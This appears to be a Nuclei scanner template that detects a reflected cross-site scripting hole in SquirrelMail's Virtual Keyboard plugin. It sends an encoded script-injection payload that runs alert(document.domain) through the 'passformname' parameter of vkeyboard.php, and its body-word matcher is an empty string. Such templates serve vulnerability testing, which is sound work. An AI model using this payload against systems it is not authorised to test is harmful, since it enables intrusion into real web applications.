id: squirrelmail-vkeyboard-xss info: name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting author: dhiyaneshDk severity: medium description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. reference: https://www.exploit-db.com/exploits/34814 tags: xss,squirrelmail requests: - method: GET path: - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" part: body - type: word words: - "text/html" part: header